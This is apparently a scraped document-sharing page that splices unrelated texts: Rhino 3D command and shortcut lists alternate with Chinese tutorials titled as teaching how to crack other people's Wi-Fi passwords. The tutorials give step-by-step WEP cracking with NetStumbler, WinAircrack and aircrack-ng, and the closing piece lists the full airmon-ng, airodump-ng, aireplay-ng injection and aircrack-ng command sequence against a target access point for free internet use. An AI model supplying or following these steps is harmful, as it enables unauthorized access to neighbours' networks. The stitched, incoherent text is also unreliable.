Face/Level(面/级)2 Mem Limit(限制)400 Distributed Rendering(分布式渲染设置) Distributed Rendering(分布式渲染)Settings(设置) Region Division(区域分割)Width(宽)48 Height(高)48 Means(方法):Region W/H(区域宽/高)▲ Sequence(排序):Triangulation(三角剖分)▲ Reverse Sequence(区域排序) Camera(照相机设置) Default Camera(缺省照相机) Type(类型):Standard(标准)▲ Height(高度)400 Delta(深度)2 Override FOV(视野)45 Auto Fit Curve(自动适合曲线)1 Physical Camera(物理照相机)On(开) Type(类型):Still camera(静止照相机)▲ Override Focal Length(焦距)40 Shutter speed(快门速度)125 Film Width(宽)36 Distortion(矢真)0 Shutter angle(快门角度)180 Zoom(焦距缩放)1 Lens shift(焦距移动)0 Shutter offset(快门位移)0 F-number(焦距比数)11 White balance (白平衡) Latency(潜伏)0 Film speed (ISO)(感光度)125

犀牛(Rhino)命令表

rhino3.0命令详解 1.点 sqq/s11选取所有的点selpt qq多点_Points 2.线 s22选取所有的线selcrv s2q选取所有的短线SelShortCrv s2w选取所有的开放的线SelOpenCrv s2e选取所有的封闭的线SelClosedCrv s2r选取所有的复合线SelPolyline 3.圆 cdd通过已知直径来画圆_Circle_Diameter cd3通过已知三点来画圆_Circle_3Point 4.椭圆 edd画椭圆,有各种参数可选,_Ellipse 5.四方形 rec画四方形(长/正方形),有各种参数可选,_Rectangle req画多边形,有各种参数可选,_Polygon 6.面 s33选取所有的面selsrf s3w选取所有的开放的面SelOpenSrf s3e选取所有的封闭的面SelClosedSrf 7.复合面 s44选取所有的复合面SelPolySrf s4w选取所有的开放的复合面SelOpenPolySrf s4e选取所有的封闭复合面SelClosedPolySrf 8.网格面 s55选取所有的网格面SelMesh s5w选取所有的开放的网格面SelOpenMesh s5e选取所有的封闭的网格面SelClosedMesh 9.层 er打开层面板layer aw打开所的层AllLayersOn 10.窗口 v3切换到三个视图_3View v4切换到四个视图_4View vtF1顶视'_SetMaximizedViewportTop vfF2前视'_SetMaximizedViewportFront vrF3右视'_SetMaximizedViewportRight vqF4三视'_SetMaximizedViewportPerspective Z放大'_Zoom ze全屏显示,物件放中间'_Zoom_Extents zea'_Zoom_All_Extents zs全屏显示,被选取的物件放中间'_Zoom_Selected

教你怎么破解别人的无线网络密码 手把手跟我操作就可以啦 很管用

如何破解无线网络密码 随着社会的进步!WIFI上网日益普及,特别是大城市中随便在一个小区搜索一下就能找到好多热点,搜索到热点然后链接上去那么我们就可以尽情的享受免费上网服务了。 不过除了公共场所以及菜鸟用户之外几乎所有的WIFI信号都是加密的,很简单换作是你你也不愿意把自己的带宽免费拿出来给别人用,所以如果你搜索到你附近有热点想免费上网的话请仔细往下学习... 破解静态WEP KEY全过程 首先通过NetStumbler确认客户端已在某AP的覆盖区内,并通过AP信号的参数进行‘踩点’(数据搜集)。

通过上图的红色框框部分内容确定该SSID名为demonalex的AP为802.11b类型设备,Encryption属性为‘已加密’,根据802.11b所支持的算法标准,该算法确定为WEP。有一点需要注意:NetStumbler对任何有使用加密算法的STA[802.11无线站点]都会在Encryption属性上标识为WEP算法,如上图中SSID为gzpia的AP使用的加密算法是WPA2-AES。 我们本次实验的目的是通过捕捉适当的数据帧进行IV (初始化向量)暴力破解得到WEP KEY,因此只需要使用airodump.exe(捕捉数据帧用)与WinAircrack.exe(破解WEP KEY用)两个程序就可以了。 首先打开ariodump.exe程序,按照下述操作:

首先程序会提示本机目前存在的所有无线网卡接口,并要求你输入需要捕捉数据帧的无线网卡接口编号,在这里我选择使用支持通用驱动的BUFFALO WNIC---编号 ‘26’;然后程序要求你输入该WNIC的芯片类型,目前大多国际通用芯片都是使用‘HermesI/Realtek’子集的,因此选择‘o’;然后需要输入要捕捉的信号所处的频道,我们需要捕捉的AP所处的频道为‘6’;提示输入捕捉数据帧后存在的文件名及其位置,若不写绝对路径则文件默认存在在winaircrack的安装目录下,以.cap 结尾,我在上例中使用的是‘last’; 最后winaircrack提示:‘是否只写入/记录IV[初始化向量]到cap文件中去?’,我在这里选择‘否/n’;确定以上步骤后程序开始捕捉数据包。 下面的过程就是漫长的等待了,直至上表中‘Packets’列的总数为300000时即可满足实验要求。根据实验的经验所得:当该AP的通信数据流量极度频繁、数据流量极大时,‘Packets’所对应的数值增长的加速度越大。当程序运行至满足 ‘Packets’=300000的要求时按Ctrl+C结束该进程。 此时你会发现在winaircrack

犀牛常用命令精华版

通用 DocumentProperties 设置Hide 隐藏 Invert _Hide 反选隐藏 Show 全部显示 Lock 锁定 Unlock 解锁UnlockSelected 选择解锁Group 编组 Ungroup 解组 Zoom _Extents 场景最大化显示Zoom _All _Extents 场景最大化显示(4窗) Zoom _All _Selected 选择物体最大化显示(4窗) SelAll 全选 SelDup 选择重复 SelCrv 选择曲线 SelLast 选择最后物体SelBrush 笔刷选择SelectionFilter 过滤选择 创建 点 Points 点 线 Polyline 多段线 Curve 控制点曲线 InterpCrv 经过点曲线InterpcrvOnSrf 曲面上画曲线Circle 圆 Ellipse 椭圆 Rectangle 矩形 曲面 ExtrudeCrv 线挤出ExtrudeCrvAlongCrv 线路径挤出 ExtrudeCrvToPoint 线挤出到点ExtrudeSrf 面挤出SrfPt 4点成面 PlanarSrf 封闭平面曲线成面 Loft 多线放样 EdgeSrf 2,3,4边线成面 Patch 补丁面 Sweep1 1轨扫 Sweep2 2轨扫 Revolve 剖线旋转面 实体 Box 六面体 Cylinder 圆柱 Sphere 球体 Ellipsoid 椭球 Pipe 圆管 编辑 通用 PointsOn or (F10) 打开控制点 Join 组合 Explode 炸开 Trim 裁剪 Untrim 裁剪修复 Split 分裂 Rebuild 重建 变形 Delete 删除 Copy 复制 Move 移动 Rotate 旋转 Scale1d 1维缩放 Scale2d 2维缩放 Scale 3维缩放 Mirror 镜像 Array 阵列 SetPt 坐标对齐 Orient 对齐 Orient3Pt 缩放对齐 Twist 扭曲 CageEdit 框架变形 Flow 曲线放样 FlowAlongSrf 曲面放样 曲线提取 Project 投影 DupBorder 拾取曲面边缘 DupEdge 拾取选择边线 Contour 等高线 Make2D 打印成曲线 ExtractIsocurve 结构线提取 曲线 Offset 偏移 OffsetCrvOnSrf 曲面上偏移 Crv2View 2视图曲线 CrvSeam 曲线端点休整 InsertControlPoint 增加控制点 Fillet 倒角 曲面 OffsetSrf 曲面偏移 Flip 翻转 UnrollSrf 摊平 FilletSrf 曲面倒角 MergeAllFaces 平面融合 MergeSrf 曲面融合 实体 Cap 加盖 FilletEdge 边缘倒角 MoveFace 平面移动 ExtractSrf 拾取平面 BooleanUnion 布尔集合 BooleanDifference 布尔差集 分析 Dir UV线查看 Distance 间距 Length 长度 Area 面积 ShowEdges 边缘线检查

蹭网工具WinAirCrackPack工具包BT3 (BackTrack 3)的使用介绍

蹭网工具WinAirCrackPack工具包\BT3 (BackTrack 3)的使用介绍 破解静态WEP KEY全过程 发现首先通过NetStumbler确认客户端已在某AP的覆盖区内,并通过AP信号的参数进行‘踩点’(数据搜集)。 NetStumbler 下载地址https://www.wendangku.net/doc/2a4149526.html,/downloads/ 通过上图的红色框框部分内容确定该SSID名为demonalex的AP为802.11b类型设备,Encryption属性为‘已加密’,根据802.11b所支持的算法标准,该算法确定为WEP。有一点需要注意:NetStumbler对任何有使用加密算法的STA[802.11无线站点]都会在Encryption属性上标识为WEP算法,如上图中SSID为gzpia的AP使用的加密算法是WPA2-AES。 破解下载Win32版AirCrack程序集---WinAirCrackPack工具包(下载地址:https://www.wendangku.net/doc/2a4149526.html,/download/wireless/aircrack/WinAircrackPack.zip)。解压缩后得到一个大概4MB的目录,其中包括六个EXE文件:aircrack.exe 原WIN32版aircrack程序airdecap.exe WEP/WPA解码程序 airodump.exe 数据帧捕捉程序Updater.exe WIN32版aircrack的升级程序 WinAircrack.exe WIN32版aircrack图形前端wzcook.exe 本地无线网卡缓存中的WEPKEY记录程序我们本次实验的目的是通过捕捉适当的数据帧进行IV(初始化向量)暴力破解得到WEP KEY,因此只需要使用airodump.exe(捕捉数据帧用)与WinAircrack.exe(破解WEP KEY用)两个程序就可以了。 首先打开ariodump.exe程序,按照下述操作:

Ubuntu下使用aircrack-ng破解无线密码(1144字)

实验平台:虚拟机Ubuntu 12.04 ,8187网卡(USB无线) 实验失败:注入时提示mon1 is on channel -1, but the AP uses channel 6之类的问题,很头疼。网络上搜索到的解决方法,说是ubuntu 系统的bug,这个问题在BT系统也出现了,不过得到了解决。 1.下载安装aircrack-ng 下面是我折腾的过程,具体的一些步骤我不知道为什么,抱着试一试的想法就执行了,没想到最后成功了。 (1)安装一些编译的环境: apt-get install build-essential apt-get install libssl-dev

(2)去https://www.wendangku.net/doc/2a4149526.html,下载tar包,我是在网上找的 (3)进入目录后,打开common.mak,修改下面的行: CFLAGS ?= -g -W -Wall -Werror –O3 修改后的结果: CFLAGS ?= -g -W -Wall -O3 (4)执行安装

make sudo make install 2.启动无线,开一个终端,ifconfig -a看看wlan是否开启,开启正常可进行下一步。这时还可以获得本机的mac地址。 现在开始破解,首先在终端中输入:sudo airmon-ng start wlan1这是启 动无线网卡的监听模式: 出现monitor mode enabled on mon0这种字样就说明无线网卡的监听模式已近成功打开,其中mon0会随着你你输入的次数而增加,依次出现mon1、mon2等。

如果未出现monitor mode enabled on mon0则说明无线网卡的监听模式未打开; 3.寻找要破解的网络,开启破解。开启终端1. a.使用命令 iwlist wlan0 scanning 有的无线在最后终止监控mon0后再使用这个命令会没有用,这是需要重启这个无线网卡。我测试中所使用的无线就出现了这种情况。 然后找到所选的网络,获得其mac地址,通道,essid等信息 b.使用命令 sudo airmon-ng start wlan0 sudo airodump-ng mon0 这时会看到无线的地址出现在屏幕上。

RHINO(犀牛)快捷键(中英对照)

RHINO快捷键(中英对照) 快捷键包括以下两个方面的内容:按功能分类的快捷键(Shortscut by function)和根据键分类的快捷键(Shortscut by key) (1)、按功能分类的快捷键 Sift+Page Up 英文:Adjust the lens length of the camera in a perspective view 中文:调整透视图中相机的焦距 Shift+Page Down 英文:Adjust the lens length of the camera in a perspective view 中文:同样是调整透视图中相机的焦距 Ctrl+Shift+Alt+Right mouse button drag (鼠标右键拖动) 英文:Adjust the lens length of the camera in a perspective view。Lens length displays on status bar 中文:调整透视图中相机的焦距,在状态栏中会显示焦距 F12 英文:Click digitizer 中文:选中数字转换器 F2 英文:Command History 中文:显示历史命令列表 Ctrl+C 英文:Copy to Clipboard 中文:拷贝至剪贴板 Alt+drag 英文:Copy while dragging 中文:按Alt键,拖动一物体即可复制该物体 Ctrl+X 英文:Cut 中文:剪切

Delete键 英文:Delete 中文:删除 F7 英文:Grid toggle 中文:显示或隐藏网格 S+Enter 英文:Grid snap 中文:网格捕获 F1 英文:Help 中文:帮助 Right click the Layer pane on the status bar.(在状态栏上右击图层块区) 英文:Layer 中文:进入层编辑框 Ctrl+G 英文:Group 中文:群组物体 Ctrl+U 英文:Ungroup 中文:取消群组物体 Ctrl+N 英文:New 中文:新建一个模板 Ctrl+Tab 英文:Next viewport active 中文:切换视图 Ctrl+O 英文:Open 中文:打开一个文件 O,F8,Shift,Ortho pane on the status bar. 英文:Ortho toggle Ortho 中文:开关正交模式 Shift+ drag with the right mouse button(鼠标右键拖动) 英文:In parallel views like the default Top,Front,and Right view,drag with the

Rhino基础命令中文版()

RHINO培训教材 1. 提升效率的基本设置 1.1 RHINO 4.0环境界面 A.主菜单(Menu):windous风格的下拉菜单,可以看到Rhino功能的展示 下拉菜单使用频率不高,习惯Rhino图示操作的可以在Options隐藏菜单,增加视窗面积

B. 主工具栏(Main )及标准工具栏(Standard ):可以快速找到常用命令 ◆ 右下角有白色小三角形的按钮表示有工具列连接 ◆ 有很多图标用鼠标左键或右键表示不同的命令 ◆ 鼠标移动到图标按钮处会显示命令注解,也会提示左右键点选的不同 ◆ 所有的工具列都可以在菜单>tools>toolbar 开启或关闭 C. 命令栏(Command ):文字命令输入,参数选用,输入数值 ◆ 执行命令后,需搭配的参数只能通过命令栏控制,操作方式可以直接输入参数的底 线字母或鼠标直接点选 ◆ 命令栏任意处点右键,可以显示最近使用过的命令,方便快速呼叫 D. 工作视窗(Main Working Viewport ):绘图区域,默认四个视窗,可以根据需要自由安排 ◆ 4view 命令可以迅速恢复默认的四个视窗 E. 状态栏(Status bar ): ◆ 显示当前光标的xyz 坐标位置 ◆ 状态锁定工具 Sanp 网格捕捉锁定 Orthe 正交模式锁定 Planner 三维绘图时强迫鼠标的坐标位置保持在最后工作深度 图层管理(Layers )及属性管理(Properties ):◆ 通常根据物体的材质、颜色等分层,合理的分层能有效提升工作效率 ◆ 属性管理与图层管理配合使用,可以在属性管理栏修改物件的图层 左键 中键 右键 点选对象 POP 快捷工具栏 确认命令 框选对象 滚轮缩放视图 重复上次命令 执行图标按钮命令 拖拽平移视图 拖拽移动物体 透视图中旋转视图 命令右键功能 Ctrl+ 复选、取消对象 缩放视图 Shift+ 复选对象 透视图中平移视图 End 端点捕捉 Int 相交点捕捉 Near 最近点捕捉 Perp 垂直点捕捉 Point 点对象捕捉 Tan 相切点捕捉 Mid 中点捕捉 Quard 4分点捕捉 Cen 中心点捕捉 Knot 节点捕捉 Disable 停用所有的捕捉功能

Aircrack-ng_for_Windows_教程

由于在Windows环境下不能如Linux环境般直接调用无线网卡,所以需要使用其他工具将无线网卡载入,以便攻击工具能够正常使用。在无线攻击套装Aircrack-ng的Windows版本下内置了这样的工具,就是airserv-ng。 步骤1:打开CMD,通过cd命令进入到aircrack-ng for Windows版本所在目录,输入airserv-ng,可以看到如图5-29所示的内容。 图5-29 在CMD下运行airserv-ng 参数解释: * -p,指定监听的端口,即提供连接服务的端口,默认为666; * -d,载入无线网卡设备,需要驱动支持; * -c,指定启动工作频道,一般设置为预攻击AP的工作频道,默认为1; * -v,调试级别设定。 作为Windows下的破解,第一步就是使用airserv-ng来载入我们当前使用的无线网卡,为后续破解做准备,命令如下(注意:在命令中出现的引号一律使用英文下的引号输入): airserv-ng -d "commview.dll|debug" 或者 airserv-ng -d "commview.dll| {my adapter id}" 输入完成后airserv-ng会自动搜寻现有无线网卡,会有提示,选择正确的无线网卡直接输入y,此时airserv-ng就在正常载入驱动后,同时开始监听本地的666端口。换句话说,airserv-ng提供的是该无线网卡的网络服务,其他计算机上的用户也可以连接到这个端口来使用这块网卡,如图5-30所示。 图5-30 airserv-ng工作中 步骤2:现在可以使用airodump-ng来搜索当前无线环境了。注意,要另开启一个CMD,再输入如下命令: airodump-ng 127.0.0.1:666

Rhino命令介绍之一-点命令

Rhino命令介绍之一——点(point) 1.Single point Command:point 一次命令输出一个点,可在图上点击鼠标,可输入坐标值,如:0,0,1; 2.Multiple points Command:points 一次命令输出多个点,可在图上点击鼠标,可输入坐标值; 3.Extract points Command:extractpt 复制曲线、曲面等的控制点、编辑点; 4.Closest point Command:closestpt

距离某点最近的点,或者一物体上距离另一物体最近的点,创建一个点; 5.Closest points between two objects Command:closestpt 两物体间最近点,创建两个点 6.左键:Mark curve start;右键:Mark curve end Command:crvstart/crvend 标记曲线的起点/终点 7.左键:Divide curve by length 右键:Divide curve by number of segments Command:Divede 按长度/份数等分曲线 8.Point grid

生成点阵列,点云形式 9.Drape point grid over objects Command:Drapept 在物体表面生成点阵列 10.Point cloud Command:Pointcloud 将点创建为点云 11.左键:Add to point cloud/右键:Remove from point cloud Command:Pointcloud 将点加入点云/将点移出点云 12.Mark ellipse,hyperbola and parabola foci

aircrack-ng详细教程

aircrack-ng详细教程 https://www.wendangku.net/doc/2a4149526.html,/download.php?id=529&ResourceID=313 教程:1、启动无线网卡的监控模式,在终端中输入:sudo airmon-ng start wlan0 (wlan0是无线网卡的端口,可在终端中输入ifconfig 查看) 2、查看无线AP在终端中输入: sudo airodump-ng mon0 (特别说明:启动监控模式后无线网的端口现在是mon0 !!!) 看看有哪些采用wep加密的AP在线,然后按ctrl+c 退出,保留终端 3、抓包 另开一个终端,输入: sudo airodump-ng -c 6 --bssid AP's MAC -w wep mon0 (-c 后面跟着的6是要破解的AP工作频道,--bissid后面跟着的AP'sMAC是要欲破解AP的MAC地址,-w后面跟着wep的是抓下来的数据包DATA保存的文件名,具体情况根据步骤2里面的在线AP更改频道和MAC地址,DATA保存的文件名可随便命名) 4、与AP建立虚拟连接 再另开一个终端,输入: sudo aireplay-ng -1 0 -a AP's MAC -h My MAC mon0 (-h后面跟着的My MAC是自己的无线网卡的MAC地址,命令: iwlist wlan0 scanning 可查看自己的MAC地址;自己的MAC 地址为ifconfig命令下wlan0对应的mac 地址) 5、进行注入 成功建立虚拟连接后输入: sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC mon0 现在回头看下步骤3的终端是不是DATA在开始飞涨!(那串ff照抄就行)6、解密 收集有15000个以上的DATA之后,另开一个终端,输入: sudo aircrack-ng wep*.cap 进行解密 (如果没算出来的话,继续等,aircrack-ng 会在DATA每增加多15000个之后就自动再运行,直到算出密码为至,注意此处文件的名字要与步骤3里面设置的名字一样,且*号是必需的) 7、收工 破解出密码后在终端中输入 sudo airmon-ng stop mon0 关闭监控模式,不然无线网卡会一直向刚刚的AP进行注入的,用ctrl+c退出或者直接关闭终端都是不行的。现在可以冲浪去了,或者重复步聚1-7破解其它的AP

相关文档